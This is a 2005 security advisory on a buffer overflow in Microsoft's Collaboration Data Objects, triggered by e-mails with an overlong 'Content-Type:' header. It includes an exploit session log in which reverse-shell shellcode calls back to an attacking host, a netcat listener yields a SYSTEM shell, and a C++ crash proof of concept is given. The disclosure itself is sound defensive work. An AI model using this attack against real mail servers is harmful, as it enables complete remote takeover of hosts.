SEC-1 LTD. www.sec-1.com Security Advisory Advisory Name: Collaboration Data Objects Buffer Overflow Vulnerability Application: Multiple Applications that implement CDO Platform: Windows 2000 (All versions) Windows XP (All versions inc sp2) Windows Server 2003 (All versions) Exchange 2000 Server Service Post-Service pack 3 Severity: Critical. Remote Code Execution Author: Gary O'leary-Steele Vendor Status: Patch Released CVE Candidate: CAN-2005-1987 Reference: http://www.sec-1.com Disclosed: 12/October/2005 Vulnerability Details: Sec-1 has identified an exploitable Buffer Overflow within Collaboration Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable. The vulnerability can be exploited by crafting an e-mail with a large header name such as "Content-Type:". A failure to correctly determine the length of the string results in a stack overflow. Successful exploitation of the vulnerability could allow the attacker to gain complete control of the vulnerable host. Under certain conditions the vulnerability can also be used to bypass content security mechanisms such as virus and content security scanners. Proof of concept code to recreate the problem is included at the bottom of this advisory. Exploit Availability: Sec-1 do not release exploit code to the general public. Attendees of the Sec-1 Applied Hacking & Intrusion prevention course will receive a copy of this exploit as part of the Sec-1 Exploit Arsenal. See: http://www.sec-1.com/applied_hacking_course.html Exploit Example: [root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53 Enter IP address of your attacking host: 10.0.0.200 Enter Port for shellcode to connect back on: 80 [*]----Connected OK! [*]----Sending MAIL FROM: me@test.com [*]----Sending RCPT TO: [*]----Sending Malformed E-mail body [*]----Shellcode Length: 316 [*]----Shellcode type: Reverse shell [*]----Done. [!] Note this may take a while. Inetinfo will crash and restart This will happen until a nops are reached. You may also want to clear the queue to restore Inetinfo.exe by deleting malformed e-mail from c:\Inetpub\mailroot\Queue [root@homer PoC]# nc -l -p 80 -v listening on [any] 80 ... 10.0.0.53: inverse host lookup failed: Unknown host connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>c:\whoami NT AUTHORITY\SYSTEM C:\WINNT\system32> Vendor Response: Microsoft have released the following information including a fix, http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CAN-2005-1987 Demonstration: The following CDO code demonstrates the problem. Step 1. Create an E-mail named vuln.eml including a large "Content-Type:" header. Step 2. // Compile with -GX option #import no_namespace rename("EOF", "adoEOF") #import rename_namespace("CDO") #include int main() { CoInitialize(0); try { CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); _StreamPtr spStream(spMsg->GetStream()); spStream->Position = 0; spStream->Type = adTypeBinary; spStream->LoadFromFile("vuln.eml"); spStream->Flush(); for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) { CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; } } catch(_com_error &e) { printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description()); } catch(...) { printf("General exception\n"); } CoUninitialize(); return 0; } CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; Copyright 2005 Sec-1 LTD. All rights reserved. ************************************************************** NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html **************************************************************